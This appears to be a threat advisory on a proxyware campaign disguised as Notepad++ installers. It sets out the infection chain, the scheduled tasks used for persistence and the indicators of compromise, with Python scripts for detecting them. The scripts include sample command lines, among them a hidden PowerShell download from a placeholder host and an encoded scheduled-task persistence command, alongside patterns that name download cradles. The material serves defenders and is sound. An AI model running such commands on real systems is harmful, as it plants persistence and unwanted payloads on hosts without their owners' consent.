Proxyware / Notepad++-Disguised Malware Campaign (2026)

Threat Type: Proxyware Malware (Proxyjacking)
Severity: Medium


Overview

A malware campaign has been observed distributing proxyware disguised as installers for legitimate software such as Notepad++ and other common utilities.

The attackers use fake download portals, cracked-software sites and malicious advertisements to trick users into running trojanized setup files.

Once installed, the malware silently turns the infected system into a proxy node that relays third-party internet traffic for the attacker's financial gain. This technique is known as proxyjacking.


What is Proxyware Malware?

Proxyware is software that shares a device's internet bandwidth with a remote proxy network. In legitimate use the device owner opts in and is paid for the bandwidth.

In this attack:

  • Proxyware is installed without the user's consent

  • The system's bandwidth is hijacked

  • The attacker is paid for traffic relayed through the victim's connection

  • The user has no visibility into, or control over, what is relayed


Infection Chain (How the Attack Works)

The infection follows a structured multi-stage process:

1. Initial Delivery

Attackers distribute malicious files through:

  • Fake software download websites

  • Cracked software distribution pages

  • Malicious ads (malvertising campaigns)

  • Compromised installer bundles

Common file names include:

  • Setup.msi

  • Setup.zip


2. Execution and Installation

Once the user runs the file:

  • The installer mimics legitimate software behavior

  • It silently installs background components

  • Creates persistence mechanisms in the system


3. Persistence Setup

The malware ensures long-term access with Windows Task Scheduler, registering tasks whose names are chosen to look like routine updaters:

  • Notepad Update Scheduler

  • UNBScheduler

  • UNPScheduler

These tasks relaunch the malware at logon or on a schedule, so it survives reboots.


4. Payload Deployment

The installer drops secondary components such as:

  • DPLoader (loader module)

  • Infatica proxyware agent

  • DigitalPulse proxy module

  • Obfuscated JavaScript or Python scripts

  • DLL-based components like infatica_agent.dll and TextShaping.dll


5. Execution Chain

The malware uses PowerShell to:

  • Download additional payloads

  • Install a Node.js runtime (used to run the campaign's JavaScript components)

  • Decrypt embedded scripts

  • Launch the proxy modules without a visible window

With no installer prompt, window or tray icon, the system operates as a proxy node without the user noticing.


Indicators of Compromise (IoCs)

File Hashes

  • Hashes reported for samples in this campaign (32-hex-character MD5 length; two of the published values are one character short as printed and will not match anything until verified against the original report):

    • 01f6153a34ab6974314cf96cced9939

    • f05e27d1d0d1e24a93fc72c8cf88924f

    • 80fe7854726d18bbc48a5370514c58b

    • ea171e48e5eeae673c41c82292e984ba


Persistence Artifacts

  • Scheduled Tasks:

    • UNBScheduler

    • UNPScheduler

    • Notepad Update Scheduler


Malicious Files

  • Setup.msi

  • Setup.zip

  • infatica_agent.dll

  • TextShaping.dll (also the name of a legitimate Windows DLL; treat only copies found outside %SystemRoot% as suspicious)
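The persistence artifacts from step 3 and the file indicators above can be hunted for mechanically. The following Python script is an added example written for this page, not code from the original advisory or from any tool it names. It consumes two inputs a responder can export from a Windows host: the CSV produced by `schtasks /query /fo CSV /v` (only the "TaskName" and "Task To Run" columns are used), and a list of file paths with their contents as read from disk. The CSV rows, paths and file contents below are constructed for illustration; the extra rule that flags any task whose action launches a script host from a user-writable directory is this example's own generalisation of the campaign's persistence, not something the advisory states.

```python
"""IoC sweep for the proxyware campaign artifacts listed above (added example)."""
import csv
import hashlib
import io
import ntpath
import re

# Scheduled task names reported for this campaign.
SUSPICIOUS_TASKS = {"UNBScheduler", "UNPScheduler", "Notepad Update Scheduler"}

# File names reported for this campaign (compared case-insensitively).
SUSPICIOUS_FILES = {"setup.msi", "setup.zip", "infatica_agent.dll", "textshaping.dll"}

# Only the two 32-hex-character values in the published list are complete MD5s;
# the other two are 31 characters as printed and cannot match anything.
KNOWN_MD5 = {
    "f05e27d1d0d1e24a93fc72c8cf88924f",
    "ea171e48e5eeae673c41c82292e984ba",
}

# Assumption (this example's generalisation, not stated in the advisory): a task
# action that launches a script host from a user-writable directory is suspicious
# whatever the task is called.
USER_WRITABLE = re.compile(r"appdata|\\temp\\|\\tmp\\|programdata|\\users\\public", re.I)
SCRIPT_HOSTS = re.compile(r"\b(?:powershell|pwsh|wscript|cscript|mshta|node)(?:\.exe)?\b", re.I)


def parse_schtasks_csv(text):
    """Parse `schtasks /query /fo CSV /v` output. schtasks may repeat the header
    line inside the data; those pseudo-rows show up as TaskName == "TaskName"."""
    rows = csv.DictReader(io.StringIO(text))
    return [r for r in rows if r.get("TaskName") not in (None, "TaskName")]


def flag_tasks(rows):
    """Return (task_name, reason) for each task matching the IoCs or the generic rule."""
    findings = []
    for row in rows:
        name = (row.get("TaskName") or "").lstrip("\\")
        action = row.get("Task To Run") or ""
        if name in SUSPICIOUS_TASKS:
            findings.append((name, "known campaign task name"))
        elif USER_WRITABLE.search(action) and SCRIPT_HOSTS.search(action):
            findings.append((name, "script host launched from user-writable path"))
    return findings


def sweep_files(files, known_md5=KNOWN_MD5):
    """files: iterable of (path, content bytes). Return (path, reason) findings.
    A hash match is reported regardless of name; a name match skips
    TextShaping.dll under the Windows directory, where that DLL legitimately lives."""
    findings = []
    for path, data in files:
        if hashlib.md5(data).hexdigest() in known_md5:
            findings.append((path, "MD5 matches IoC list"))
            continue
        base = ntpath.basename(path).lower()
        if base not in SUSPICIOUS_FILES:
            continue
        if base == "textshaping.dll" and ntpath.dirname(path).lower().startswith("c:\\windows"):
            continue  # expected location of the legitimate DLL
        findings.append((path, "file name from IoC list"))
    return findings


# Constructed sample export; a real one has many more columns and tasks.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Status","Author","Task To Run"\n'
    '"WS01","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","Microsoft Corporation",'
    '"%windir%\\system32\\defrag.exe -c -h -o -$"\n'
    '"HostName","TaskName","Status","Author","Task To Run"\n'
    '"WS01","\\UNBScheduler","Ready","WS01\\alice",'
    '"C:\\Users\\alice\\AppData\\Roaming\\updater\\node.exe C:\\Users\\alice\\AppData\\Roaming\\updater\\agent.js"\n'
    '"WS01","\\VendorUpdateCheck","Ready","WS01\\alice",'
    '"powershell.exe -w hidden -ep bypass -f C:\\Users\\alice\\AppData\\Local\\Temp\\u.ps1"\n'
)

# Constructed sample files (paths and bytes are placeholders, not real samples).
SAMPLE_FILES = [
    (r"C:\Windows\System32\TextShaping.dll", b"MZ legitimate system dll (constructed)"),
    (r"C:\Users\alice\Downloads\notepadpp_setup\TextShaping.dll", b"MZ sideloaded copy (constructed)"),
    (r"C:\Users\alice\AppData\Roaming\updater\infatica_agent.dll", b"MZ proxy agent (constructed)"),
    (r"C:\Users\alice\Downloads\Setup.msi", b"constructed msi bytes"),
    (r"C:\Users\alice\Documents\notes.txt", b"plain notes"),
]

if __name__ == "__main__":
    for finding in flag_tasks(parse_schtasks_csv(SAMPLE_SCHTASKS_CSV)):
        print("TASK", *finding)
    for finding in sweep_files(SAMPLE_FILES):
        print("FILE", *finding)
```

On a live host, feed the script the real `schtasks` export and walk user-writable directories for the file sweep; the generic task rule will also surface tasks this campaign renames, at the cost of reviewing any legitimate software that updates itself from %APPDATA%.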


Impact of Infection

Systems affected by this malware may experience:

  • Unauthorized consumption of internet bandwidth

  • High network traffic while no one is using the system

  • Reduced system performance

  • Background communication with attacker-controlled infrastructure (command-and-control and proxy relay endpoints)

  • Third-party traffic, possibly abusive, leaving the network from the victim's IP address

  • Possible secondary malware installation

  • Increased risk of full system compromise


Security Best Practices

To reduce risk from proxyware and similar malware:

  • Download software only from official vendor websites

  • Avoid cracked or pirated software sources

  • Keep operating systems and applications fully updated

  • Block execution from user-writable locations such as %APPDATA%, %LOCALAPPDATA% and %TEMP% (AppLocker, WDAC or Software Restriction Policies)

  • Restrict PowerShell (Constrained Language Mode) and disable WScript/CScript for standard users where possible

  • Enable PowerShell script block logging (Event ID 4104) and module logging, and forward the logs to central monitoring

  • Use application allow-listing so that unapproved installers, DLLs and script runtimes cannot run

  • Block risky file types at the mail gateway and web proxy (.exe, .bat, .js, .vbs, .scr, .dll), and quarantine .msi and .zip installers downloaded from non-vendor sites

  • Disable unused RDP services or secure them behind firewalls

  • Implement email filtering with SPF, DKIM and DMARC

  • Keep offline backups for critical systems

  • Segment internal networks to isolate sensitive assets

  • Deploy ad-blocking tools to reduce malvertising exposure


Detection and Monitoring

Organizations should monitor for:

  • Unexpected outbound connections from workstations that stay open for long periods or go to proxy-network infrastructure

  • High bandwidth usage from systems that are idle or locked

  • Unknown scheduled tasks, especially ones whose action runs from %APPDATA% or %TEMP%

  • PowerShell execution anomalies: hidden windows, -EncodedCommand, execution-policy bypass, download cradles

  • Suspicious DLL loading, such as a DLL with a system-component name loaded from a user-writable directory

  • Node.js or other scripting runtime installations without approval
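The PowerShell stages from the execution chain (download, Node.js install, decryption, hidden launch) leave traces in process-creation command lines (Event ID 4688, Sysmon Event 1) and in script block logs (Event ID 4104). The following Python triage routine is an added example written for this page, not code from the advisory or from any tool it names. The command lines it runs over are constructed (the paths, task name reuse and the `example.invalid` URL are placeholders), and the rule set and the two-hit escalation threshold are this example's own assumptions. It decodes an `-EncodedCommand` payload and substitutes the decoded script for the base64 blob, so the rules inspect what will actually run rather than the encoding.

```python
"""Triage of PowerShell command lines for the behaviours in the execution chain above (added example)."""
import base64
import re

# Each rule names one behaviour from the execution chain; the patterns are this
# example's assumptions about how those behaviours look on the command line.
RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|"
        r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)),
    ("node_runtime", re.compile(r"\bnode(?:-v\d[\w.-]*)?\.(?:exe|msi)\b|\bnpm\b", re.I)),
    ("task_persistence", re.compile(r"register-scheduledtask|schtasks(?:\.exe)?\s+/create", re.I)),
    ("user_writable_path", re.compile(r"appdata|\\temp\\|programdata|\\users\\public", re.I)),
    ("decode_in_memory", re.compile(r"frombase64string|invoke-expression|\biex\b|\baes\w*\b", re.I)),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
THRESHOLD = 2  # rule hits needed to escalate (assumption)


def expand_encoded(cmdline):
    """If an encoded command is present and decodes cleanly, return
    (True, cmdline with the blob replaced by the decoded script); else (False, cmdline)."""
    m = ENCODED.search(cmdline)
    if not m:
        return False, cmdline
    try:
        inner = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return False, cmdline
    return True, cmdline[:m.start(1)] + inner + cmdline[m.end(1):]


def analyse(cmdline):
    """Return the names of the rules that fire, evaluated on the expanded command line."""
    was_encoded, text = expand_encoded(cmdline)
    hits = ["encoded_command"] if was_encoded else []
    hits.extend(name for name, rx in RULES if rx.search(text))
    return hits


def triage(cmdlines, threshold=THRESHOLD):
    """Return (index, hits) for every command line with at least `threshold` hits."""
    out = []
    for i, line in enumerate(cmdlines):
        hits = analyse(line)
        if len(hits) >= threshold:
            out.append((i, hits))
    return out


# Constructed command lines in the shape of a 4688 / Sysmon CommandLine field.
_INNER = (r'msiexec /i $env:TEMP\node-v20.11.0-x64.msi /qn; '
          r'schtasks /create /tn "UNPScheduler" /tr "$env:APPDATA\node\node.exe $env:APPDATA\node\a.js" /sc onlogon')
SAMPLE_CMDLINES = [
    r'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"',
    r'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/n.zip -OutFile $env:APPDATA\nu\n.zip; '
    r'Expand-Archive $env:APPDATA\nu\n.zip $env:APPDATA\nu"',
    "powershell.exe -NoP -NonI -W Hidden -Enc " + base64.b64encode(_INNER.encode("utf-16-le")).decode("ascii"),
    r'"C:\Program Files\Notepad++\notepad++.exe" C:\Users\alice\Documents\todo.txt',
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_CMDLINES):
        print(index, ", ".join(hits))
```

Any single rule fires on legitimate administration now and then (an IT script that downloads from %APPDATA%, for instance), which is why escalation needs two; the encoded-command expansion is the part worth keeping even if the rule list is swapped for a SIEM's own, since without it the download and persistence stages are invisible in the log.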



Conclusion

This proxyware campaign demonstrates a growing trend of malware abusing trusted software brands to gain initial access. The attack relies heavily on user deception, fake installers, and silent persistence techniques.

Strong software hygiene, strict download policies, and endpoint monitoring are key controls to prevent compromise.
